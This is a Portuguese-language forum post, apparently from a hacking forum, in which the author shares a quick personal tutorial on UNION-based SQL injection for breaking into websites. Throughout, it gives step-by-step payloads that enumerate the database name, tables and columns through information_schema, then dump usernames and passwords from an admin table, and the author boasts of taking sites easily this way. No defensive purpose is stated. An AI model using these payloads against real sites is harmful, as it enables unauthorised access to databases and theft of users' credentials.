Tenho um bloco de notas que eu fiz aqui pra mim mesmo quando tava aprendendo sql injection e pegava os sites fácil seguindo meu próprio tuto, não tem explicando o nome de cada comando porque como eu disse, é um "Sql rápido", ou não porém, ótimo para iniciantes, ou não né ;P
Nome banco de dados
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9
no final da url insira :
from information_schema.tables where table_schema=database()
e na coluna que aparece no site mude o valor para database() ex:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,database(),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
=================
saber o nome das tabelas
apenas mude o databas() para group_contat(table_name) ex:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
======================
PARA saber as COLUNAS das tabelas bonitinho, em group_concat(table_name) insira após o table_name isto :
,0x3a,column_name) E DEPOIS lá no final da url em "from imformation_schema.tables" toque o tables por columns ex:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name,0x3a,column_name),3,4,5, 6,7,8,9 from information_schema.columns where table_schema=database()
===================
e agora ?
depois de descobrirmos o nome das colunas e das tabelas, vamos verificar o conteúdo das colunas, claro o que você está procurando é o usuário e a senha né ? ;DD ou não, idiota!
então vamos lá:
a parte mais fácil ,vc irá pegar o nome da tabela que contém a coluna do login e da senha e vai até o final da url,
a partir do "from" vc apaga tudo e coloca assim "from Nome_da_tabela" ex:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name,0x3a,column_name),3,4,5, 6,7,8,9 from nome_da_tabela
E AGORA ABEXTADO! vamos lá no group_concat onde tinhamos os nomes das tabelas e colunas e simplesmente trocanos o nome "table_name" e "column_name"
pelo nome nome das colunas EXEMPLO, usuário e senha... vejamos
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(usuario,0x3a,senha),3,4,5,6,7,8,9 from adm_usuarios
Créditos: Ohniugan
Comment